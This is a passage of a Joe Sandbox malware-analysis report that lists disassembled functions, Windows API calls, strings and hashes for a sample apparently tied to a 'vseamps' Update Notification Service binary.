                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3424473247-0
                                  • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                  • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                  • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                  Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                  • String ID: bad exception$csm$csm$csm
                                  • API String ID: 3766904988-820278400
                                  • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                  • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                  • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                  Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                  • String ID:
                                  • API String ID: 2707001247-0
                                  • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                  • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                  Function 00007FFBC3204804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction ID: 1356d442e3e1cbd580c23c4486f58e76ae064cc2ac78e26c56f4437b5130832d
                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                  • Instruction Fuzzy Hash: 31D171B29087458AEF10AF75D4807AE77A0FB55788F984135DA8D6BB55CF38E489CB00
                                  Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                  Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                  Function 00007FFBC320B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3013587201-537541572
                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction ID: a1cef2cd13d50d612b5117f40123c4705f743849a301ed93bbc353ed06221cba
                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                  • Instruction Fuzzy Hash: 7F41C1B1B19A0281EE25EF36E910EBB2391BF05B90F8C4535DD4D6B794DE3CE8098740
                                  Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                  • API String ID: 1119674940-1966266597
                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                  Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                  • API String ID: 3702919091-996641649
                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                  Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$Info
                                  • String ID:
                                  • API String ID: 1775632426-0
                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                  Function 00007FFBC320712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071B1
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071BF
                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC32071E9
                                  • FreeLibrary.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207257
                                  • GetProcAddress.KERNEL32(?,?,?,00007FFBC32072EB,?,?,?,00007FFBC3203EC0,?,?,?,?,00007FFBC3203CFD), ref: 00007FFBC3207263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction ID: 557b634dfabaab833202b5a774b35273f93e90df1d8c47218e0ae8bfa7347e25
                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                  • Instruction Fuzzy Hash: FD31D4B1B1A74195FE15AF26E400DBA6794BF48B60F9D0634ED5D2F390DE3CE4498300
                                  Function 00007FFBC3209444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction ID: 2cb3988977a9158e39452ff99fdd54e8acfe6c828045fcd8ef4dd32b7d245c12
                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                  • Instruction Fuzzy Hash: 76213DB0A0C68245FE64BF31D65193B63519F447B0F9C0634E93F2EAE6DE2CA4499B00
                                  Function 00007FFBC3210100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction ID: d6e3fe966b1ae33d53e51d73b65c9d03710d9330b42a1facbbfcc81ee0a017a1
                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                  • Instruction Fuzzy Hash: 45118461718B41C2EB509F66E944B2AB3A0FB98FE4F484234E95D5B794CF3CD9448744
                                  Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                  • String ID: vseamps
                                  • API String ID: 3197017603-3944098904
                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                  Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Messagesprintf_s
                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                  • API String ID: 2642950106-3610746849
                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                  Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                  Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
